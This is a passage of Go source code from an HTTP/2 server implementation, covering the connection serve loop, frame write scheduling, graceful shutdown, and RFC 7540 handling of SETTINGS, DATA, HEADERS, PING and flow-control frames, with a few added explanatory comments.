go sc.readFrames() // closed by defer sc.conn.Close above
settingsTimer := time.AfterFunc(firstSettingsTimeout, sc.onSettingsTimer)
defer settingsTimer.Stop()
loopNum := 0
for {
loopNum++
select {
case wr := <-sc.wantWriteFrameCh:
if se, ok := wr.write.(StreamError); ok {
sc.resetStream(se)
break
}
sc.writeFrame(wr)
case res := <-sc.wroteFrameCh:
sc.wroteFrame(res)
case res := <-sc.readFrameCh:
if !sc.processFrameFromReader(res) {
return
}
res.readMore()
if settingsTimer != nil {
settingsTimer.Stop()
settingsTimer = nil
}
case m := <-sc.bodyReadCh:
sc.noteBodyRead(m.st, m.n)
case msg := <-sc.serveMsgCh:
switch v := msg.(type) {
case func(int):
v(loopNum) // for testing
case *serverMessage:
switch v {
case settingsTimerMsg:
sc.logf("timeout waiting for SETTINGS frames from %v", sc.conn.RemoteAddr())
return
case idleTimerMsg:
sc.vlogf("connection is idle")
sc.goAway(ErrCodeNo)
case shutdownTimerMsg:
sc.vlogf("GOAWAY close timer fired; closing conn from %v", sc.conn.RemoteAddr())
return
case gracefulShutdownMsg:
sc.startGracefulShutdownInternal()
default:
panic("unknown timer")
}
case *startPushRequest:
sc.startPush(v)
default:
panic(fmt.Sprintf("unexpected type %T", v))
}
}
if sc.inGoAway && sc.curOpenStreams() == 0 && !sc.needToSendGoAway && !sc.writingFrame {
return
}
}
}
func (sc *serverConn) awaitGracefulShutdown(sharedCh <-chan struct{}, privateCh chan struct{}) {
select {
case <-sc.doneServing:
case <-sharedCh:
close(privateCh)
}
}
type serverMessage int
// Message values sent to serveMsgCh.
var (
settingsTimerMsg = new(serverMessage)
idleTimerMsg = new(serverMessage)
shutdownTimerMsg = new(serverMessage)
gracefulShutdownMsg = new(serverMessage)
)
func (sc *serverConn) onSettingsTimer() { sc.sendServeMsg(settingsTimerMsg) }
func (sc *serverConn) onIdleTimer() { sc.sendServeMsg(idleTimerMsg) }
func (sc *serverConn) onShutdownTimer() { sc.sendServeMsg(shutdownTimerMsg) }
func (sc *serverConn) sendServeMsg(msg interface{}) {
sc.serveG.checkNotOn() // NOT
select {
case sc.serveMsgCh <- msg:
case <-sc.doneServing:
}
}
// readPreface reads the ClientPreface greeting from the peer
// or returns an error on timeout or an invalid greeting.
func (sc *serverConn) readPreface() error {
errc := make(chan error, 1)
go func() {
// Read the client preface
buf := make([]byte, len(ClientPreface))
if _, err := io.ReadFull(sc.conn, buf); err != nil {
errc <- err
} else if !bytes.Equal(buf, clientPreface) {
errc <- fmt.Errorf("bogus greeting %q", buf)
} else {
errc <- nil
}
}()
timer := time.NewTimer(prefaceTimeout) // TODO: configurable on *Server?
defer timer.Stop()
select {
case <-timer.C:
return errors.New("timeout waiting for client preface")
case err := <-errc:
if err == nil {
if VerboseLogs {
sc.vlogf("http2: server: client %v said hello", sc.conn.RemoteAddr())
}
}
return err
}
}
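// For reference (added): ClientPreface is the fixed 24-byte string
// "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n" (RFC 7540, Section 3.5), defined
// elsewhere in this package; clientPreface is its []byte form.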
var errChanPool = sync.Pool{
New: func() interface{} { return make(chan error, 1) },
}
var writeDataPool = sync.Pool{
New: func() interface{} { return new(writeData) },
}
// writeDataFromHandler writes DATA response frames from a handler on
// the given stream.
func (sc *serverConn) writeDataFromHandler(stream *stream, data []byte, endStream bool) error {
ch := errChanPool.Get().(chan error)
writeArg := writeDataPool.Get().(*writeData)
*writeArg = writeData{stream.id, data, endStream}
err := sc.writeFrameFromHandler(FrameWriteRequest{
write: writeArg,
stream: stream,
done: ch,
})
if err != nil {
return err
}
var frameWriteDone bool // the frame write is done (successfully or not)
select {
case err = <-ch:
frameWriteDone = true
case <-sc.doneServing:
return errClientDisconnected
case <-stream.cw:
// If both ch and stream.cw were ready (as might
// happen on the final Write after an http.Handler
// ends), prefer the write result. Otherwise this
// might just be us successfully closing the stream.
// The writeFrameAsync and serve goroutines guarantee
// that the ch send will happen before the stream.cw
// close.
select {
case err = <-ch:
frameWriteDone = true
default:
return errStreamClosed
}
}
errChanPool.Put(ch)
if frameWriteDone {
writeDataPool.Put(writeArg)
}
return err
}
// writeFrameFromHandler sends wr to sc.wantWriteFrameCh, but aborts
// if the connection has gone away.
//
// This must not be run from the serve goroutine itself, else it might
// deadlock writing to sc.wantWriteFrameCh (which is only mildly
// buffered and is read by serve itself). If you're on the serve
// goroutine, call writeFrame instead.
func (sc *serverConn) writeFrameFromHandler(wr FrameWriteRequest) error {
sc.serveG.checkNotOn() // NOT
select {
case sc.wantWriteFrameCh <- wr:
return nil
case <-sc.doneServing:
// Serve loop is gone.
// Client has closed their connection to the server.
return errClientDisconnected
}
}
// writeFrame schedules a frame to write and sends it if there's nothing
// already being written.
//
// There is no pushback here (the serve goroutine never blocks). It's
// the http.Handlers that block, waiting for their previous frames to
// make it onto the wire.
//
// If you're not on the serve goroutine, use writeFrameFromHandler instead.
func (sc *serverConn) writeFrame(wr FrameWriteRequest) {
sc.serveG.check()
// If true, wr will not be written and wr.done will not be signaled.
var ignoreWrite bool
// We are not allowed to write frames on closed streams. RFC 7540 Section
// 5.1.1 says: "An endpoint MUST NOT send frames other than PRIORITY on
// a closed stream." Our server never sends PRIORITY, so that exception
// does not apply.
//
// The serverConn might close an open stream while the stream's handler
// is still running. For example, the server might close a stream when it
// receives bad data from the client. If this happens, the handler might
// attempt to write a frame after the stream has been closed (since the
// handler hasn't yet been notified of the close). In this case, we simply
// ignore the frame. The handler will notice that the stream is closed when
// it waits for the frame to be written.
//
// As an exception to this rule, we allow sending RST_STREAM after close.
// This allows us to immediately reject new streams without tracking any
// state for those streams (except for the queued RST_STREAM frame). This
// may result in duplicate RST_STREAMs in some cases, but the client should
// ignore those.
if wr.StreamID() != 0 {
_, isReset := wr.write.(StreamError)
if state, _ := sc.state(wr.StreamID()); state == stateClosed && !isReset {
ignoreWrite = true
}
}
// Don't send a 100-continue response if we've already sent headers.
// See golang.org/issue/14030.
switch wr.write.(type) {
case *writeResHeaders:
wr.stream.wroteHeaders = true
case write100ContinueHeadersFrame:
if wr.stream.wroteHeaders {
// We do not need to notify wr.done because this frame is
// never written with wr.done != nil.
if wr.done != nil {
panic("wr.done != nil for write100ContinueHeadersFrame")
}
ignoreWrite = true
}
}
if !ignoreWrite {
sc.writeSched.Push(wr)
}
sc.scheduleFrameWrite()
}
// startFrameWrite starts a goroutine to write wr (in a separate
// goroutine since that might block on the network), and updates the
// serve goroutine's view of the world based on the info in wr.
func (sc *serverConn) startFrameWrite(wr FrameWriteRequest) {
sc.serveG.check()
if sc.writingFrame {
panic("internal error: can only be writing one frame at a time")
}
st := wr.stream
if st != nil {
switch st.state {
case stateHalfClosedLocal:
switch wr.write.(type) {
case StreamError, handlerPanicRST, writeWindowUpdate:
// RFC 7540 Section 5.1 allows sending RST_STREAM, PRIORITY, and WINDOW_UPDATE
// in this state. (We never send PRIORITY from the server, so that is not checked.)
default:
panic(fmt.Sprintf("internal error: attempt to send frame on a half-closed-local stream: %v", wr))
}
case stateClosed:
panic(fmt.Sprintf("internal error: attempt to send frame on a closed stream: %v", wr))
}
}
if wpp, ok := wr.write.(*writePushPromise); ok {
var err error
wpp.promisedID, err = wpp.allocatePromisedID()
if err != nil {
sc.writingFrameAsync = false
wr.replyToWriter(err)
return
}
}
sc.writingFrame = true
sc.needsFrameFlush = true
if wr.write.staysWithinBuffer(sc.bw.Available()) {
sc.writingFrameAsync = false
err := wr.write.writeFrame(sc)
sc.wroteFrame(frameWriteResult{wr, err})
} else {
sc.writingFrameAsync = true
go sc.writeFrameAsync(wr)
}
}
// errHandlerPanicked is the error given to any callers blocked in a read from
// Request.Body when the main goroutine panics. Since most handlers read in the
// main ServeHTTP goroutine, this will show up rarely.
var errHandlerPanicked = errors.New("http2: handler panicked")
// wroteFrame is called on the serve goroutine with the result of
// whatever happened on writeFrameAsync.
func (sc *serverConn) wroteFrame(res frameWriteResult) {
sc.serveG.check()
if !sc.writingFrame {
panic("internal error: expected to be already writing a frame")
}
sc.writingFrame = false
sc.writingFrameAsync = false
wr := res.wr
if writeEndsStream(wr.write) {
st := wr.stream
if st == nil {
panic("internal error: expecting non-nil stream")
}
switch st.state {
case stateOpen:
// Here we would go to stateHalfClosedLocal in
// theory, but since our handler is done and
// the net/http package provides no mechanism
// for closing a ResponseWriter while still
// reading data (see possible TODO at top of
// this file), we go into closed state here
// anyway, after telling the peer we're
// hanging up on them. We'll transition to
// stateClosed after the RST_STREAM frame is
// written.
st.state = stateHalfClosedLocal
// Section 8.1: a server MAY request that the client abort
// transmission of a request without error by sending a
// RST_STREAM with an error code of NO_ERROR after sending
// a complete response.
sc.resetStream(streamError(st.id, ErrCodeNo))
case stateHalfClosedRemote:
sc.closeStream(st, errHandlerComplete)
}
} else {
switch v := wr.write.(type) {
case StreamError:
// st may be unknown if the RST_STREAM was generated to reject bad input.
if st, ok := sc.streams[v.StreamID]; ok {
sc.closeStream(st, v)
}
case handlerPanicRST:
sc.closeStream(wr.stream, errHandlerPanicked)
}
}
// Reply (if requested) to unblock the ServeHTTP goroutine.
wr.replyToWriter(res.err)
sc.scheduleFrameWrite()
}
// scheduleFrameWrite tickles the frame writing scheduler.
//
// If a frame is already being written, nothing happens. This will be called again
// when the frame is done being written.
//
// If a frame isn't being written and we need to send one, the best frame
// to send is selected, preferring first things that aren't
// stream-specific (e.g. ACKing settings), and then finding the
// highest priority stream.
//
// If a frame isn't being written and there's nothing else to send, we
// flush the write buffer.
func (sc *serverConn) scheduleFrameWrite() {
sc.serveG.check()
if sc.writingFrame || sc.inFrameScheduleLoop {
return
}
sc.inFrameScheduleLoop = true
for !sc.writingFrameAsync {
if sc.needToSendGoAway {
sc.needToSendGoAway = false
sc.startFrameWrite(FrameWriteRequest{
write: &writeGoAway{
maxStreamID: sc.maxClientStreamID,
code: sc.goAwayCode,
},
})
continue
}
if sc.needToSendSettingsAck {
sc.needToSendSettingsAck = false
sc.startFrameWrite(FrameWriteRequest{write: writeSettingsAck{}})
continue
}
if !sc.inGoAway || sc.goAwayCode == ErrCodeNo {
if wr, ok := sc.writeSched.Pop(); ok {
sc.startFrameWrite(wr)
continue
}
}
if sc.needsFrameFlush {
sc.startFrameWrite(FrameWriteRequest{write: flushFrameWriter{}})
sc.needsFrameFlush = false // after startFrameWrite, since it sets this true
continue
}
break
}
sc.inFrameScheduleLoop = false
}
// startGracefulShutdown gracefully shuts down a connection. This
// sends GOAWAY with ErrCodeNo to tell the client we're gracefully
// shutting down. The connection isn't closed until all current
// streams are done.
//
// startGracefulShutdown returns immediately; it does not wait until
// the connection has shut down.
func (sc *serverConn) startGracefulShutdown() {
sc.serveG.checkNotOn() // NOT
sc.shutdownOnce.Do(func() { sc.sendServeMsg(gracefulShutdownMsg) })
}
func (sc *serverConn) startGracefulShutdownInternal() {
sc.goAwayIn(ErrCodeNo, 0)
}
func (sc *serverConn) goAway(code ErrCode) {
sc.serveG.check()
var forceCloseIn time.Duration
if code != ErrCodeNo {
forceCloseIn = 250 * time.Millisecond
} else {
// TODO: configurable
forceCloseIn = 1 * time.Second
}
sc.goAwayIn(code, forceCloseIn)
}
func (sc *serverConn) goAwayIn(code ErrCode, forceCloseIn time.Duration) {
sc.serveG.check()
if sc.inGoAway {
return
}
if forceCloseIn != 0 {
sc.shutDownIn(forceCloseIn)
}
sc.inGoAway = true
sc.needToSendGoAway = true
sc.goAwayCode = code
sc.scheduleFrameWrite()
}
func (sc *serverConn) shutDownIn(d time.Duration) {
sc.serveG.check()
sc.shutdownTimer = time.AfterFunc(d, sc.onShutdownTimer)
}
func (sc *serverConn) resetStream(se StreamError) {
sc.serveG.check()
sc.writeFrame(FrameWriteRequest{write: se})
if st, ok := sc.streams[se.StreamID]; ok {
st.resetQueued = true
}
}
// processFrameFromReader processes the serve loop's read from readFrameCh from the
// frame-reading goroutine.
// processFrameFromReader returns whether the connection should be kept open.
func (sc *serverConn) processFrameFromReader(res readFrameResult) bool {
sc.serveG.check()
err := res.err
if err != nil {
if err == ErrFrameTooLarge {
sc.goAway(ErrCodeFrameSize)
return true // goAway will close the loop
}
clientGone := err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err)
if clientGone {
// TODO: could we also get into this state if
// the peer does a half close
// (e.g. CloseWrite) because they're done
// sending frames but they're still wanting
// our open replies? Investigate.
// TODO: add CloseWrite to crypto/tls.Conn first
// so we have a way to test this? I suppose
// just for testing we could have a non-TLS mode.
return false
}
} else {
f := res.f
if VerboseLogs {
sc.vlogf("http2: server read frame %v", summarizeFrame(f))
}
err = sc.processFrame(f)
if err == nil {
return true
}
}
switch ev := err.(type) {
case StreamError:
sc.resetStream(ev)
return true
case goAwayFlowError:
sc.goAway(ErrCodeFlowControl)
return true
case ConnectionError:
sc.logf("http2: server connection error from %v: %v", sc.conn.RemoteAddr(), ev)
sc.goAway(ErrCode(ev))
return true // goAway will handle shutdown
default:
if res.err != nil {
sc.vlogf("http2: server closing client connection; error reading frame from client %s: %v", sc.conn.RemoteAddr(), err)
} else {
sc.logf("http2: server closing client connection: %v", err)
}
return false
}
}
func (sc *serverConn) processFrame(f Frame) error {
sc.serveG.check()
// First frame received must be SETTINGS.
if !sc.sawFirstSettings {
if _, ok := f.(*SettingsFrame); !ok {
return ConnectionError(ErrCodeProtocol)
}
sc.sawFirstSettings = true
}
switch f := f.(type) {
case *SettingsFrame:
return sc.processSettings(f)
case *MetaHeadersFrame:
return sc.processHeaders(f)
case *WindowUpdateFrame:
return sc.processWindowUpdate(f)
case *PingFrame:
return sc.processPing(f)
case *DataFrame:
return sc.processData(f)
case *RSTStreamFrame:
return sc.processResetStream(f)
case *PriorityFrame:
return sc.processPriority(f)
case *GoAwayFrame:
return sc.processGoAway(f)
case *PushPromiseFrame:
// A client cannot push. Thus, servers MUST treat the receipt of a PUSH_PROMISE
// frame as a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
return ConnectionError(ErrCodeProtocol)
default:
sc.vlogf("http2: server ignoring frame: %v", f.Header())
return nil
}
}
func (sc *serverConn) processPing(f *PingFrame) error {
sc.serveG.check()
if f.IsAck() {
// 6.7 PING: " An endpoint MUST NOT respond to PING frames
// containing this flag."
return nil
}
if f.StreamID != 0 {
// "PING frames are not associated with any individual
// stream. If a PING frame is received with a stream
// identifier field value other than 0x0, the recipient MUST
// respond with a connection error (Section 5.4.1) of type
// PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if sc.inGoAway && sc.goAwayCode != ErrCodeNo {
return nil
}
sc.writeFrame(FrameWriteRequest{write: writePingAck{f}})
return nil
}
func (sc *serverConn) processWindowUpdate(f *WindowUpdateFrame) error {
sc.serveG.check()
switch {
case f.StreamID != 0: // stream-level flow control
state, st := sc.state(f.StreamID)
if state == stateIdle {
// Section 5.1: "Receiving any frame other than HEADERS
// or PRIORITY on a stream in this state MUST be
// treated as a connection error (Section 5.4.1) of
// type PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if st == nil {
// "WINDOW_UPDATE can be sent by a peer that has sent a
// frame bearing the END_STREAM flag. This means that a
// receiver could receive a WINDOW_UPDATE frame on a "half
// closed (remote)" or "closed" stream. A receiver MUST
// NOT treat this as an error, see Section 5.1."
return nil
}
if !st.flow.add(int32(f.Increment)) {
return streamError(f.StreamID, ErrCodeFlowControl)
}
default: // connection-level flow control
if !sc.flow.add(int32(f.Increment)) {
return goAwayFlowError{}
}
}
sc.scheduleFrameWrite()
return nil
}
func (sc *serverConn) processResetStream(f *RSTStreamFrame) error {
sc.serveG.check()
state, st := sc.state(f.StreamID)
if state == stateIdle {
// 6.4 "RST_STREAM frames MUST NOT be sent for a
// stream in the "idle" state. If a RST_STREAM frame
// identifying an idle stream is received, the
// recipient MUST treat this as a connection error
		// (Section 5.4.1) of type PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if st != nil {
st.cancelCtx()
sc.closeStream(st, streamError(f.StreamID, f.ErrCode))
}
return nil
}
func (sc *serverConn) closeStream(st *stream, err error) {
sc.serveG.check()
if st.state == stateIdle || st.state == stateClosed {
panic(fmt.Sprintf("invariant; can't close stream in state %v", st.state))
}
st.state = stateClosed
if st.writeDeadline != nil {
st.writeDeadline.Stop()
}
if st.isPushed() {
sc.curPushedStreams--
} else {
sc.curClientStreams--
}
delete(sc.streams, st.id)
if len(sc.streams) == 0 {
sc.setConnState(http.StateIdle)
if sc.srv.IdleTimeout != 0 {
sc.idleTimer.Reset(sc.srv.IdleTimeout)
}
if h1ServerKeepAlivesDisabled(sc.hs) {
sc.startGracefulShutdownInternal()
}
}
if p := st.body; p != nil {
// Return any buffered unread bytes worth of conn-level flow control.
// See golang.org/issue/16481
sc.sendWindowUpdate(nil, p.Len())
p.CloseWithError(err)
}
st.cw.Close() // signals Handler's CloseNotifier, unblocks writes, etc
sc.writeSched.CloseStream(st.id)
}
func (sc *serverConn) processSettings(f *SettingsFrame) error {
sc.serveG.check()
if f.IsAck() {
sc.unackedSettings--
if sc.unackedSettings < 0 {
// Why is the peer ACKing settings we never sent?
// The spec doesn't mention this case, but
// hang up on them anyway.
return ConnectionError(ErrCodeProtocol)
}
return nil
}
if err := f.ForeachSetting(sc.processSetting); err != nil {
return err
}
sc.needToSendSettingsAck = true
sc.scheduleFrameWrite()
return nil
}
func (sc *serverConn) processSetting(s Setting) error {
sc.serveG.check()
if err := s.Valid(); err != nil {
return err
}
if VerboseLogs {
sc.vlogf("http2: server processing setting %v", s)
}
switch s.ID {
case SettingHeaderTableSize:
sc.headerTableSize = s.Val
sc.hpackEncoder.SetMaxDynamicTableSize(s.Val)
case SettingEnablePush:
sc.pushEnabled = s.Val != 0
case SettingMaxConcurrentStreams:
sc.clientMaxStreams = s.Val
case SettingInitialWindowSize:
return sc.processSettingInitialWindowSize(s.Val)
case SettingMaxFrameSize:
sc.maxFrameSize = int32(s.Val) // the maximum valid s.Val is < 2^31
case SettingMaxHeaderListSize:
sc.peerMaxHeaderListSize = s.Val
default:
// Unknown setting: "An endpoint that receives a SETTINGS
// frame with any unknown or unsupported identifier MUST
// ignore that setting."
if VerboseLogs {
sc.vlogf("http2: server ignoring unknown setting %v", s)
}
}
return nil
}
func (sc *serverConn) processSettingInitialWindowSize(val uint32) error {
sc.serveG.check()
// Note: val already validated to be within range by
// processSetting's Valid call.
// "A SETTINGS frame can alter the initial flow control window
// size for all current streams. When the value of
// SETTINGS_INITIAL_WINDOW_SIZE changes, a receiver MUST
// adjust the size of all stream flow control windows that it
// maintains by the difference between the new value and the
// old value."
old := sc.initialStreamSendWindowSize
sc.initialStreamSendWindowSize = int32(val)
growth := int32(val) - old // may be negative
for _, st := range sc.streams {
if !st.flow.add(growth) {
// 6.9.2 Initial Flow Control Window Size
// "An endpoint MUST treat a change to
// SETTINGS_INITIAL_WINDOW_SIZE that causes any flow
// control window to exceed the maximum size as a
// connection error (Section 5.4.1) of type
// FLOW_CONTROL_ERROR."
return ConnectionError(ErrCodeFlowControl)
}
}
return nil
}
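// Worked example (added for illustration): if the client first advertised
// SETTINGS_INITIAL_WINDOW_SIZE = 65535 and later re-advertises 131070, then
// growth = 65535 and every open stream's send window grows by 65535; a
// stream with 1000 bytes of quota left now has 66535. A decrease may drive
// a window negative, which RFC 7540 Section 6.9.2 explicitly allows.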
func (sc *serverConn) processData(f *DataFrame) error {
sc.serveG.check()
if sc.inGoAway && sc.goAwayCode != ErrCodeNo {
return nil
}
data := f.Data()
// "If a DATA frame is received whose stream is not in "open"
// or "half closed (local)" state, the recipient MUST respond
// with a stream error (Section 5.4.2) of type STREAM_CLOSED."
id := f.Header().StreamID
state, st := sc.state(id)
if id == 0 || state == stateIdle {
// Section 5.1: "Receiving any frame other than HEADERS
// or PRIORITY on a stream in this state MUST be
// treated as a connection error (Section 5.4.1) of
// type PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if st == nil || state != stateOpen || st.gotTrailerHeader || st.resetQueued {
// This includes sending a RST_STREAM if the stream is
// in stateHalfClosedLocal (which currently means that
// the http.Handler returned, so it's done reading &
// done writing). Try to stop the client from sending
// more DATA.
// But still enforce their connection-level flow control,
// and return any flow control bytes since we're not going
// to consume them.
if sc.inflow.available() < int32(f.Length) {
return streamError(id, ErrCodeFlowControl)
}
// Deduct the flow control from inflow, since we're
// going to immediately add it back in
// sendWindowUpdate, which also schedules sending the
// frames.
sc.inflow.take(int32(f.Length))
sc.sendWindowUpdate(nil, int(f.Length)) // conn-level
if st != nil && st.resetQueued {
// Already have a stream error in flight. Don't send another.
return nil
}
return streamError(id, ErrCodeStreamClosed)
}
if st.body == nil {
panic("internal error: should have a body in this state")
}
// Sender sending more than they'd declared?
if st.declBodyBytes != -1 && st.bodyBytes+int64(len(data)) > st.declBodyBytes {
st.body.CloseWithError(fmt.Errorf("sender tried to send more than declared Content-Length of %d bytes", st.declBodyBytes))
return streamError(id, ErrCodeStreamClosed)
}
if f.Length > 0 {
// Check whether the client has flow control quota.
if st.inflow.available() < int32(f.Length) {
return streamError(id, ErrCodeFlowControl)
}
st.inflow.take(int32(f.Length))
if len(data) > 0 {
wrote, err := st.body.Write(data)
if err != nil {
return streamError(id, ErrCodeStreamClosed)
}
if wrote != len(data) {
panic("internal error: bad Writer")
}
st.bodyBytes += int64(len(data))
}
// Return any padded flow control now, since we won't
// refund it later on body reads.
if pad := int32(f.Length) - int32(len(data)); pad > 0 {
sc.sendWindowUpdate32(nil, pad)
sc.sendWindowUpdate32(st, pad)
}
}
if f.StreamEnded() {
st.endStream()
}
return nil
}
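// Worked example (added): for a DATA frame with f.Length == 100 carrying 90
// bytes of data and 10 bytes of padding, the 10 padding bytes are refunded
// immediately via the two sendWindowUpdate32 calls above, while the 90 data
// bytes are refunded later as the handler reads the body.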
func (sc *serverConn) processGoAway(f *GoAwayFrame) error {
sc.serveG.check()
if f.ErrCode != ErrCodeNo {
sc.logf("http2: received GOAWAY %+v, starting graceful shutdown", f)
} else {
sc.vlogf("http2: received GOAWAY %+v, starting graceful shutdown", f)
}
sc.startGracefulShutdownInternal()
// http://tools.ietf.org/html/rfc7540#section-6.8
// We should not create any new streams, which means we should disable push.
sc.pushEnabled = false
return nil
}
// isPushed reports whether the stream is server-initiated.
func (st *stream) isPushed() bool {
return st.id%2 == 0
}
// endStream closes a Request.Body's pipe. It is called when a DATA
// frame says a request body is over (or after trailers).
func (st *stream) endStream() {
sc := st.sc
sc.serveG.check()
if st.declBodyBytes != -1 && st.declBodyBytes != st.bodyBytes {
st.body.CloseWithError(fmt.Errorf("request declared a Content-Length of %d but only wrote %d bytes",
st.declBodyBytes, st.bodyBytes))
} else {
st.body.closeWithErrorAndCode(io.EOF, st.copyTrailersToHandlerRequest)
st.body.CloseWithError(io.EOF)
}
st.state = stateHalfClosedRemote
}
// copyTrailersToHandlerRequest is run in the Handler's goroutine in
// its Request.Body.Read just before it gets io.EOF.
func (st *stream) copyTrailersToHandlerRequest() {
for k, vv := range st.trailer {
if _, ok := st.reqTrailer[k]; ok {
			// Only copy it over if it was pre-declared.
st.reqTrailer[k] = vv
}
}
}
// onWriteTimeout is run on its own goroutine (from time.AfterFunc)
// when the stream's WriteTimeout has fired.
func (st *stream) onWriteTimeout() {
st.sc.writeFrameFromHandler(FrameWriteRequest{write: streamError(st.id, ErrCodeInternal)})
}
func (sc *serverConn) processHeaders(f *MetaHeadersFrame) error {
sc.serveG.check()
id := f.StreamID
if sc.inGoAway {
// Ignore.
return nil
}
// http://tools.ietf.org/html/rfc7540#section-5.1.1
// Streams initiated by a client MUST use odd-numbered stream
// identifiers. [...] An endpoint that receives an unexpected
// stream identifier MUST respond with a connection error
// (Section 5.4.1) of type PROTOCOL_ERROR.
if id%2 != 1 {
return ConnectionError(ErrCodeProtocol)
}
// A HEADERS frame can be used to create a new stream or
// send a trailer for an open one. If we already have a stream
// open, let it process its own HEADERS frame (trailers at this
// point, if it's valid).
if st := sc.streams[f.StreamID]; st != nil {
if st.resetQueued {
// We're sending RST_STREAM to close the stream, so don't bother
// processing this frame.
return nil
}
return st.processTrailerHeaders(f)
}
// [...] The identifier of a newly established stream MUST be
// numerically greater than all streams that the initiating
// endpoint has opened or reserved. [...] An endpoint that
// receives an unexpected stream identifier MUST respond with
// a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
if id <= sc.maxClientStreamID {
return ConnectionError(ErrCodeProtocol)
}
sc.maxClientStreamID = id
if sc.idleTimer != nil {
sc.idleTimer.Stop()
}
// http://tools.ietf.org/html/rfc7540#section-5.1.2
// [...] Endpoints MUST NOT exceed the limit set by their peer. An
// endpoint that receives a HEADERS frame that causes their
// advertised concurrent stream limit to be exceeded MUST treat
// this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR
// or REFUSED_STREAM.
if sc.curClientStreams+1 > sc.advMaxStreams {
if sc.unackedSettings == 0 {
// They should know better.
return streamError(id, ErrCodeProtocol)
}
// Assume it's a network race, where they just haven't
// received our last SETTINGS update. But actually
// this can't happen yet, because we don't yet provide
// a way for users to adjust server parameters at
// runtime.
return streamError(id, ErrCodeRefusedStream)
}
initialState := stateOpen
if f.StreamEnded() {
initialState = stateHalfClosedRemote
}
st := sc.newStream(id, 0, initialState)
if f.HasPriority() {
if err := checkPriority(f.StreamID, f.Priority); err != nil {
return err
}
sc.writeSched.AdjustStream(st.id, f.Priority)
}
rw, req, err := sc.newWriterAndRequest(st, f)
if err != nil {
return err
}
st.reqTrailer = req.Trailer
if st.reqTrailer != nil {
st.trailer = make(http.Header)
}
st.body = req.Body.(*requestBody).pipe // may be nil
st.declBodyBytes = req.ContentLength
handler := sc.handler.ServeHTTP
if f.Truncated {
// Their header list was too long. Send a 431 error.
handler = handleHeaderListTooLong
} else if err := checkValidHTTP2RequestHeaders(req.Header); err != nil {
handler = new400Handler(err)
}
// The net/http package sets the read deadline from the
// http.Server.ReadTimeout during the TLS handshake, but then
// passes the connection off to us with the deadline already
// set. Disarm it here after the request headers are read,
// similar to how the http1 server works. Here it's
// technically more like the http1 Server's ReadHeaderTimeout
// (in Go 1.8), though. That's a more sane option anyway.
if sc.hs.ReadTimeout != 0 {
sc.conn.SetReadDeadline(time.Time{})
}
go sc.runHandler(rw, req, handler)
return nil
}
func (st *stream) processTrailerHeaders(f *MetaHeadersFrame) error {
sc := st.sc
sc.serveG.check()
if st.gotTrailerHeader {
return ConnectionError(ErrCodeProtocol)
}
st.gotTrailerHeader = true
if !f.StreamEnded() {
return streamError(st.id, ErrCodeProtocol)
}
if len(f.PseudoFields()) > 0 {
return streamError(st.id, ErrCodeProtocol)
}
if st.trailer != nil {
for _, hf := range f.RegularFields() {
key := sc.canonicalHeader(hf.Name)
if !ValidTrailerHeader(key) {
// TODO: send more details to the peer somehow. But http2 has
// no way to send debug data at a stream level. Discuss with
// HTTP folk.
return streamError(st.id, ErrCodeProtocol)
}
st.trailer[key] = append(st.trailer[key], hf.Value)
}
}
st.endStream()
return nil
}
func checkPriority(streamID uint32, p PriorityParam) error {
if streamID == p.StreamDep {
// Section 5.3.1: "A stream cannot depend on itself. An endpoint MUST treat
// this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR."
// Section 5.3.3 says that a stream can depend on one of its dependencies,
// so it's only self-dependencies that are forbidden.
return streamError(streamID, ErrCodeProtocol)
}
return nil
}
func (sc *serverConn) processPriority(f *PriorityFrame) error {
if sc.inGoAway {
return nil
}
if err := checkPriority(f.StreamID, f.PriorityParam); err != nil {
return err
}
sc.writeSched.AdjustStream(f.StreamID, f.PriorityParam)
return nil
}
func (sc *serverConn) newStream(id, pusherID uint32, state streamState) *stream {
sc.serveG.check()
if id == 0 {
panic("internal error: cannot create stream with id 0")
}
ctx, cancelCtx := contextWithCancel(sc.baseCtx)
st := &stream{
sc: sc,
id: id,
state: state,
ctx: ctx,
cancelCtx: cancelCtx,
}
st.cw.Init()
st.flow.conn = &sc.flow // link to conn-level counter
st.flow.add(sc.initialStreamSendWindowSize)
st.inflow.conn = &sc.inflow // link to conn-level counter
st.inflow.add(sc.srv.initialStreamRecvWindowSize())
if sc.hs.WriteTimeout != 0 {
st.writeDeadline = time.AfterFunc(sc.hs.WriteTimeout, st.onWriteTimeout)
}
sc.streams[id] = st
sc.writeSched.OpenStream(st.id, OpenStreamOptions{PusherID: pusherID})
if st.isPushed() {
sc.curPushedStreams++
} else {
sc.curClientStreams++
}
if sc.curOpenStreams() == 1 {
sc.setConnState(http.StateActive)
}
return st
}
func (sc *serverConn) newWriterAndRequest(st *stream, f *MetaHeadersFrame) (*responseWriter, *http.Request, error) {
sc.serveG.check()
rp := requestParam{
method: f.PseudoValue("method"),
scheme: f.PseudoValue("scheme"),
authority: f.PseudoValue("authority"),
path: f.PseudoValue("path"),
}
isConnect := rp.method == "CONNECT"
if isConnect {
if rp.path != "" || rp.scheme != "" || rp.authority == "" {
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
} else if rp.method == "" || rp.path == "" || (rp.scheme != "https" && rp.scheme != "http") {
// See 8.1.2.6 Malformed Requests and Responses:
//
// Malformed requests or responses that are detected
// MUST be treated as a stream error (Section 5.4.2)
// of type PROTOCOL_ERROR."
//
// 8.1.2.3 Request Pseudo-Header Fields
// "All HTTP/2 requests MUST include exactly one valid
// value for the :method, :scheme, and :path
// pseudo-header fields"
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
bodyOpen := !f.StreamEnded()
if rp.method == "HEAD" && bodyOpen {
// HEAD requests can't have bodies
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
rp.header = make(http.Header)
for _, hf := range f.RegularFields() {
rp.header.Add(sc.canonicalHeader(hf.Name), hf.Value)
}
if rp.authority == "" {
rp.authority = rp.header.Get("Host")
}
